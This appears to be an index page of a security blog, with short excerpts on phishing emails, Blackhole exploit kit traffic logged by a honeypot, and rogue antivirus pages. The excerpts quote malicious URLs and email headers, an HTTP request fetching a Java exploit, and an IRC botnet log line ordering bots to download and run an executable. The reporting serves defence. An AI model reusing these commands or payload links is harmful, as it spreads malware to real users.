When we analyzed few Twitter followers in one of our websites, we noted that there was an user that was following us, see the image: We have analyzed the website (infected): www (dot) wordpress-how-to-videos (dot) com The website wordpress-how-to-videos(dot)com is hosted at BSE Software GmbH and its current IP address is 82.220....
Continue reading...

We received few emails with subject: Amazon.com Order Confirmation Inside the email message there is a HREF link that redirects users to a malicious web page containing malicious javascript code used to redirect users to the main URL of Blackhole exploit kit: The Blackhole exploit kit URL is: GET /main.php?page=017f3bb5c2be6a41 ...
Continue reading...

Our honeypot has logged few new Blackhole Exploit Kit activity. The Java exploit file Set.jar is downloaded: GET /Set.jar HTTP/1.1 content-type: application/x-java-archive User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_13 Host: 64.111.24.122 HTTP/1.1 200 OK Server: nginx Date: Wed, 06 Jun 2012 22:43:12 GMT Content-Type: app...
Continue reading...

Users have reported another malicious email message with subject “Your Bill Me Later notice” that states you have made a payment over the phone of $60.12 to Bill Me Later website. The email body is full of HREF links that point to a lot of malicious URLs, view a screenshot of the email message: Email [...]
Continue reading...

We have logged a new email that looks like to be sent by LinedIn: The email header info shows it is a scam: Received: from lhost10.forahost.net (server-178.211.48.24.as42926.net [178.211.48.24]) Received: from c9069568.static.spo.virtua.com.br ([201.6.149.104]:49583 helo=fixnot.com.tr) by lhost10.forahost.net Date: Fri, 04 May 2...
Continue reading...

We have received few emails that looked like to be sent from LinkedIn: But after checking email header details it was clearly a spam: Return-Path: trtro@www.trt.ro Received: from vps136.whmpanels.com (unknown [89.42.219.181]) Received: from [95.6.42.101] (helo=www.trt.ro) by vps136.whmpanels.com Date: Fri, 30 Mar 2012 21:37:47 +...
Continue reading...

We have received various spam emails that simulate messages from Better Business Bureau (BBB), but in real are used to spread malicious links that leads to Blackhole Exploit Kit. The subject of the emails looks like this: Your updated information is necessary A screenshot of the email: Other details of the emails: Return-Path: &...
Continue reading...

We have detected few fake scanner pages that are still active and that distribute the dangerous executable files of rogue security software. First initial fake alert: Fake scanner page in action: Prompt to download the (infected) setup file of the rogue software: Report date: 2011-04-15 01:10:23 (GMT 1) File name: bestav2-exe Fi...
Continue reading...

We noticed the following details in a log file in our sandbox: :m{IT|XXX}agaigyu!agaigyu@hostXXX.it JOIN :#ngr :Apache2.0 332 m{IT|XXX}agaigyu #ngr :.j -c FRA,ESP,ITA #it .dl http://efirst-data. in/install.48208.exe .mod msn on .msn.int # .msn.set http://image4msn. com/ :Apache2.0 333 m{IT|XXX}agaigyu #ngr xxx 1301238177 These d...
Continue reading...

Windows Emergency System (similar to Windows Emergency System) is another rogue security software that aims to scan the system to find errors, instead it shows fake errors, stating it is needed to buy the full version of the software to fix the non-existent errors. Fake security alerts: Fake scanner page: Other fake security ale...
Continue reading...